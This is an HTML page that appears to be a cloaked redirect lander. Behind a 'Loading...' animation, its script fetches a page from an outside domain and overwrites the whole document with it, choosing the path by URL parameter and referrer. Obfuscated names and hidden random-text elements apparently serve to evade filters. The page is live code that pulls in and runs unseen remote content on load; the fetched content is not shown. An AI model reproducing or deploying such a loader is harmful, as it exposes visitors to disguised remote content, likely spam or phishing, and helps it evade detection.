<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mIpnpG {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mIpnpG .rjuunwVun {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mIpnpG .content {
            line-height: 50px;
            text-align: center
        }

        .mIpnpG .img {
            width: 100%
        }

        .mIpnpG .dqaOcJd {
            text-align: center
        }

        .mIpnpG .dqaOcJd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mIpnpG .dqaOcJd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mIpnpG .dqaOcJd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mIpnpG .dqaOcJd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mIpnpG .dqaOcJd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mIpnpG .dqaOcJd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mIpnpG .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nZwDrRmNAld(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var A06vw = nZwDrRmNAld('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ A06vw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ A06vw +".html?a=share";
		}
		
        yg45rY=url+"#"+new Date().getTime();
        yg45rY && function() {
            $.get(yg45rY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >yRcKYrQPxvaPn7l8R13Es2rRKyjpJ5Us</ul>
<img  src='' style='display:none'>
<span style='display:none'>NVO4KLBjXJvxuTkvmSfYrxcnaEC3pARVfHAHEzV</span>
<ul style='display:none' >yRcKYrQPxvaPn7l8R13Es2rRKyjpJ5Us</ul>
<span style='display:none'>NVO4KLBjXJvxuTkvmSfYrxcnaEC3pARVfHAHEzV</span>
<img  src='' style='display:none'><div class="mIpnpG">
    <div class="rjuunwVun">
        <div class="dqaOcJd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>QxrbvMZoLRipP0Z1M9akb7Z7VOZAYmAvDma3LN0JprdUnu0FBMERHTvvE0OxON2LA4Xp6nAFzQphSCMTVKn6fV8WtYo9RqY</a>
<a  href='#' style='display:none'>QxrbvMZoLRipP0Z1M9akb7Z7VOZAYmAvDma3LN0JprdUnu0FBMERHTvvE0OxON2LA4Xp6nAFzQphSCMTVKn6fV8WtYo9RqY</a>
<p  style='display:none'>IY5gBt3nKXRWVVBZgI29oobSPKnKCu6S</p>
<li style='display:none' >eNgZr804W2OMPugGyb3RgQovMCEoPKWwD5q5FOc1Uzmlt6IsEqydo4N3KQ8q</li></body>
</html>